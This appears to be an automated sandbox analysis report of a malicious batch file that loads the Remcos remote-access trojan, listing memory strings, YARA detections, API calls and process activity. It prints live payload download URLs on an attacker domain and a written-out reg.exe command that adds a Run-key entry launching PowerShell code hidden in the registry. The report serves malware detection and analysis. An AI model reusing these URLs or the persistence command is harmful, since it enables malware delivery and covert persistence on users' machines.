              Source: bhv6E57.tmp.15.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?9f3db9405f1b2793ad8d8de9770248e4
              Source: bhv6E57.tmp.15.drString found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?4aec53910de6415b25f2c4faf3f7e54a
              Source: bhv6E57.tmp.15.drString found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?77290711a5e44a163ac2e666ad7b53fd
              Source: bhv6E57.tmp.15.drString found in binary or memory: https://fp.msedge.net/conf/v1/asgw/fpconfig.min.json
              Source: bhv6E57.tmp.15.drString found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
              Source: powershell.exe, 00000005.00000002.2380563936.0000000004818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000002.00000002.2235185548.0000024409019000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000002.00000002.2262357013.00000244205FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co5
              Source: bhv6E57.tmp.15.drString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
              Source: bhv6E57.tmp.15.drString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
              Source: bhv6E57.tmp.15.drString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: msiexec.exeString found in binary or memory: https://login.yahoo.com/config/login
              Source: bhv6E57.tmp.15.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
              Source: bhv6E57.tmp.15.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
              Source: bhv6E57.tmp.15.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
              Source: bhv6E57.tmp.15.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
              Source: powershell.exe, 00000002.00000002.2257431898.00000244184D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2402221496.0000000005729000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: bhv6E57.tmp.15.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
              Source: bhv6E57.tmp.15.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-06-30-24/PreSignInSettingsConfig.json?One
              Source: bhv6E57.tmp.15.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-06-40-12/PreSignInSettingsConfig.json
              Source: bhv6E57.tmp.15.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=14d1c105224b3e736c3c
              Source: bhv6E57.tmp.15.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/741e3e8c607c445262f3add0e58b18f19e0502af.xml?OneDriveUpdate=7fe112
              Source: powershell.exe, 00000002.00000002.2235185548.0000024409A19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2235185548.000002440868C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://plieltd.top
              Source: msiexec.exe, 00000009.00000002.4585582185.0000000005F41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://plieltd.top/
              Source: powershell.exe, 00000002.00000002.2235185548.000002440868C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://plieltd.top/Kvalificeredes.qxdP
              Source: powershell.exe, 00000005.00000002.2380563936.0000000004818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://plieltd.top/Kvalificeredes.qxdXRgl8
              Source: msiexec.exe, 00000009.00000002.4585582185.0000000005F04000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.4585582185.0000000005F41000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.4596776958.00000000217E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://plieltd.top/dUEhUdoBD66.bin
              Source: msiexec.exe, 00000009.00000002.4596776958.00000000217E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://plieltd.top/dUEhUdoBD66.binRekosMaggaranticonstruct.ro/dUEhUdoBD66.bin
              Source: msiexec.exe, 00000009.00000002.4585582185.0000000005F04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://plieltd.top/dUEhUdoBD66.bine
              Source: msiexec.exe, 00000009.00000002.4585582185.0000000005F41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://plieltd.top/s
              Source: bhv6E57.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
              Source: bhv6E57.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
              Source: bhv6E57.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
              Source: bhv6E57.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
              Source: bhv6E57.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
              Source: bhv6E57.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-3a99f64809c6780df035.js
              Source: bhv6E57.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
              Source: bhv6E57.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ac5cfbeadfd63fc27ffd.chunk.v7.js
              Source: bhv6E57.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
              Source: bhv6E57.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.68ab311bcca4f86f9ef5.chunk.v7.js
              Source: bhv6E57.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.2ce72562ad7c0ae7059c.chunk.v7.js
              Source: bhv6E57.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-ba2888a24179bf152f3d.js
              Source: bhv6E57.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.169ce481376dceef3ef6.chunk.v7.c
              Source: bhv6E57.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.b24d6b48aeb44c7b5bf6.chunk.v7.j
              Source: bhv6E57.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
              Source: bhv6E57.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
              Source: bhv6E57.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
              Source: bhv6E57.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
              Source: bhv6E57.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
              Source: bhv6E57.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
              Source: bhv6E57.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
              Source: bhv6E57.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
              Source: bhv6E57.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
              Source: bhv6E57.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
              Source: bhv6E57.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
              Source: bhv6E57.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
              Source: bhv6E57.tmp.15.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
              Source: bhv6E57.tmp.15.drString found in binary or memory: https://www.digicert.com/CPS0
              Source: msiexec.exe, msiexec.exe, 00000012.00000002.2578300080.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: msiexec.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
              Source: bhv6E57.tmp.15.drString found in binary or memory: https://www.office.com/
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
              Source: unknownHTTPS traffic detected: 104.21.56.189:443 -> 192.168.2.6:49710 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.56.189:443 -> 192.168.2.6:49846 version: TLS 1.2
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0041183A OpenClipboard,GetLastError,15_2_0041183A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,15_2_0040987A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,15_2_004098E2
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,16_2_00406DFC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,16_2_00406E9F
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,18_2_004068B5
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,18_2_004072B5

              E-Banking Fraud

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000009.00000002.4585582185.0000000005F41000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.2601743861.0000000005F68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.4585582185.0000000005F55000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.2540279422.0000000005F66000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.4585582185.0000000005F68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.2602767372.0000000005F68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.2569144632.0000000005F68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 2996, type: MEMORYSTR

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: amsi32_6776.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 2912, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 6776, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,15_2_0040DD85
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00401806 NtdllDefWindowProc_W,15_2_00401806
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_004018C0 NtdllDefWindowProc_W,15_2_004018C0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_004016FD NtdllDefWindowProc_A,16_2_004016FD
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_004017B7 NtdllDefWindowProc_A,16_2_004017B7
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_00402CAC NtdllDefWindowProc_A,18_2_00402CAC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_00402D66 NtdllDefWindowProc_A,18_2_00402D66
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD3476B0F62_2_00007FFD3476B0F6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD3476BEA22_2_00007FFD3476BEA2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD347670F32_2_00007FFD347670F3
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD34764D552_2_00007FFD34764D55
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD347669CD2_2_00007FFD347669CD
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD347626DD2_2_00007FFD347626DD
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD34766B682_2_00007FFD34766B68
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD34766BAA2_2_00007FFD34766BAA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_045DEDF05_2_045DEDF0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_045DF6C05_2_045DF6C0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_045DEAA85_2_045DEAA8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_21BE71949_2_21BE7194
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_21BDB5C19_2_21BDB5C1
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0044B04015_2_0044B040
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0043610D15_2_0043610D
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0044731015_2_00447310
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0044A49015_2_0044A490
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0040755A15_2_0040755A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0043C56015_2_0043C560
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0044B61015_2_0044B610
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0044D6C015_2_0044D6C0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_004476F015_2_004476F0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0044B87015_2_0044B870
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0044081D15_2_0044081D
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0041495715_2_00414957
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_004079EE15_2_004079EE
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00407AEB15_2_00407AEB
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0044AA8015_2_0044AA80
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00412AA915_2_00412AA9
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00404B7415_2_00404B74
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00404B0315_2_00404B03
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0044BBD815_2_0044BBD8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00404BE515_2_00404BE5
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00404C7615_2_00404C76
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00415CFE15_2_00415CFE
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00416D7215_2_00416D72
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00446D3015_2_00446D30
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00446D8B15_2_00446D8B
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00406E8F15_2_00406E8F
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_0040503816_2_00405038
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_0041208C16_2_0041208C
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_004050A916_2_004050A9
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_0040511A16_2_0040511A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_0043C13A16_2_0043C13A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_004051AB16_2_004051AB
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_0044930016_2_00449300
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_0040D32216_2_0040D322
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_0044A4F016_2_0044A4F0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_0043A5AB16_2_0043A5AB
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_0041363116_2_00413631
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_0044669016_2_00446690
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_0044A73016_2_0044A730
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_004398D816_2_004398D8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_004498E016_2_004498E0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_0044A88616_2_0044A886
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_0043DA0916_2_0043DA09
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_00438D5E16_2_00438D5E
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_00449ED016_2_00449ED0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_0041FE8316_2_0041FE83
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_00430F5416_2_00430F54
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_004050C218_2_004050C2
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_004014AB18_2_004014AB
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_0040513318_2_00405133
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_004051A418_2_004051A4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_0040124618_2_00401246
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_0040CA4618_2_0040CA46
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_0040523518_2_00405235
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_004032C818_2_004032C8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_004222D918_2_004222D9
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_0040168918_2_00401689
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_00402F6018_2_00402F60
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 004169A7 appears 87 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0044DB70 appears 41 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 004165FF appears 35 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00422297 appears 42 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00444B5A appears 37 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00413025 appears 79 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00416760 appears 69 times
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Forsnakket154" /t REG_EXPAND_SZ /d "%Dyrespor% -windowstyle 1 $Okkupationstropperne=(gp -Path 'HKCU:\Software\Driftsikkerheds\').Dokkedal;%Dyrespor% ($Okkupationstropperne)"
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 6220
              Source: unknownProcess created: Commandline size = 6244
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 6220Jump to behavior
              Source: amsi32_6776.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 2912, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 6776, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.troj.spyw.evad.winBAT@22/12@3/3
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,15_2_004182CE
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,18_2_00410DE1
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,15_2_00418758
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle,15_2_00413D4C
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_004148B6 FindResourceW,SizeofResource,LoadResource,LockResource,15_2_004148B6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Unslave.MelJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4052:120:WilError_03
              Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-MC4T64
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4044:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5576:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3420:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vuwvtkwx.eay.ps1Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\LTEXSP 5634 HISP9005 ST MSDS DOKUME74247liniereletbrunkagerne.bat" "
              Source: C:\Windows\SysWOW64\msiexec.exeSystem information queried: HandleInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=2912
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6776
              Source: C:\Windows\SysWOW64\reg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=2912
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
              Source: msiexec.exe, msiexec.exe, 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: msiexec.exe, msiexec.exe, 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: msiexec.exe, 00000009.00000002.4597777003.0000000022420000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
              Source: msiexec.exe, msiexec.exe, 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
              Source: msiexec.exe, msiexec.exe, 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: msiexec.exe, msiexec.exe, 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: msiexec.exe, 0000000F.00000002.2597753288.0000000004D0E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000003.2594486228.0000000004D0F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: msiexec.exe, msiexec.exe, 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: C:\Windows\SysWOW64\msiexec.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_16-33204
              Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\LTEXSP 5634 HISP9005 ST MSDS DOKUME74247liniereletbrunkagerne.bat" "
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
